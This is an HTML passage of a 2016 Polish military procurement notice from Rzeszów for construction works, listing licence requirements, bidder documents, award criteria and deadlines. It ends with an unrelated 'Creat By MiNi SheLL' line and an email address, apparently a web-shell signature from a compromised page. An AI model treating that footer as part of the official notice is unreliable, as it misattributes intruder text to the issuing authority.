a) 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika budowy/robót w branży ogólnobudowlanej, posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U z 2013 r., poz. 1409 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2016 r., poz. 65), lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2014 r. poz. 1946) w specjalności konstrukcyjno budowlanej;
b) 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika robót w branży elektrycznej, posiadającą uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U z 2013 r., poz. 1409 z późn. zm.) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U z 2016 r., poz. 65), lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2014 r. poz. 1946) w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
UWAGA: 
Zamawiający dopuszcza łączenie funkcji kierownika robót w poszczególnych branżach. tzn. warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia wykaże, że np. dysponuje 1 osobą, która posiada uprawnienia do kierowania robotami budowlanymi  w zakresie każdej z ww. specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca dla wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest wykazać Zamawiającemu, że będzie dysponował zasobami tych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia a także, że stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów. W tym celu Zamawiający wymaga w szczególności pisemnego zobowiązania tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Formularz ofertowy, ew. pełnomocnictwo, dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.34wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej, jak również istnieje możliwość jej odebrania w Sekcji Zamówień Publicznych: ul. Krakowska 11B, 35-111 Rzeszów, budynek nr 12 pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2016 godzina 10:30, miejsce: 34 Wojskowy Oddział Gospodarczy w Rzeszowie, ul. Krakowska 11B, budynek nr 12, pok. nr 1 (kancelaria jawna), 35-111 Rzeszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy Pzp Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com